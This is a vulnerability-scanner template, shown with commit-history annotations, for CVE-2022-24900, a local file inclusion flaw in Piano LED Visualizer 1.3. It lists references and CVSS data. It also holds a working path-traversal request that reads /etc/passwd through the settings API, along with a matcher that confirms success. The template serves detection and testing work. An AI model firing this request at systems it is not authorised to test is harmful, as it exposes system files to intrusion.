2022-05-30 09:03:55 +00:00
|
|
|
id: CVE-2022-24900
|
|
|
|
|
|
|
|
info:
|
2022-06-29 14:29:11 +00:00
|
|
|
name: Piano LED Visualizer 1.3 - Local File Inclusion
|
2022-05-30 09:03:55 +00:00
|
|
|
author: 0x_Akoko
|
|
|
|
severity: high
|
2022-05-30 09:28:20 +00:00
|
|
|
description: |
|
2022-06-29 14:29:11 +00:00
|
|
|
Piano LED Visualizer 1.3 and prior are vulnerable to local file inclusion.
|
2022-05-30 09:03:55 +00:00
|
|
|
reference:
|
|
|
|
- https://github.com/onlaj/Piano-LED-Visualizer/issues/350
|
|
|
|
- https://vuldb.com/?id.198714
|
2022-05-30 09:28:20 +00:00
|
|
|
- https://www.cvedetails.com/cve/CVE-2022-24900/
|
2022-05-30 12:54:39 +00:00
|
|
|
- https://github.com/onlaj/Piano-LED-Visualizer/commit/3f10602323cd8184e1c69a76b815655597bf0ee5
|
2022-05-30 09:03:55 +00:00
|
|
|
classification:
|
2022-05-30 12:54:39 +00:00
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
|
|
|
|
cvss-score: 8.6
|
2022-05-30 09:03:55 +00:00
|
|
|
cve-id: CVE-2022-24900
|
2022-05-30 12:54:39 +00:00
|
|
|
cwe-id: CWE-610
|
2022-07-02 11:46:34 +00:00
|
|
|
tags: cve,cve2022,lfi,piano,iot,oss
|
2022-05-30 09:03:55 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/api/change_setting?second_value=no_reload&disable_sequence=true&value=../../../../../../../etc/passwd"
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: regex
|
2022-05-30 09:28:20 +00:00
|
|
|
part: body
|
2022-05-30 09:03:55 +00:00
|
|
|
regex:
|
|
|
|
- "root:.*:0:0:"
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2022-06-29 14:29:11 +00:00
|
|
|
|
|
|
|
# Enhanced by mp on 2022/06/29
|